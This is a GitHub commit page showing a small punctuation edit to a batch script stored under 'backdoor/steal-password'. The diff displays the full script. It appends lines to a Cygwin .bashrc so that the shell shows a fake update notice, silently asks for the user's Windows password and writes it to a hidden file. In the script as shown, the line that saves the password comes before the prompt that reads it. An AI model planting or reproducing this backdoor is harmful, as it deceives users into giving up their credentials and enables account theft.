Skip to content

Commit

Permalink
Update Cygwin64-fake-win-password-prompt.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
cervoise authored Oct 10, 2018
1 parent d5041e8 commit a0b8a66
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions backdoor/steal-password/Cygwin64-fake-win-password-prompt.bat
Original file line number Diff line number Diff line change
@@ -1,8 +1,8 @@
C:\cygwin64\Cygwin.bat
echo "echo \"Cygwin must check for update !\"" >> .bashrc
echo "echo \"Cygwin must check for update! \"" >> .bashrc
echo "echo $WINPASS >> .hidden-win-pass" >> .bashrc
echo "read -sp \"Please enter you Windows password for $WINUSER: \" WINPASS " >> .bashrc
echo "sleep 2" >> .bashrc
echo "echo \"\"" >> .bashrc
echo "echo \"Cygwin updated !\"" >> .bashrc
echo "echo \"Cygwin updated! \"" >> .bashrc
exit

0 comments on commit a0b8a66

Please sign in to comment.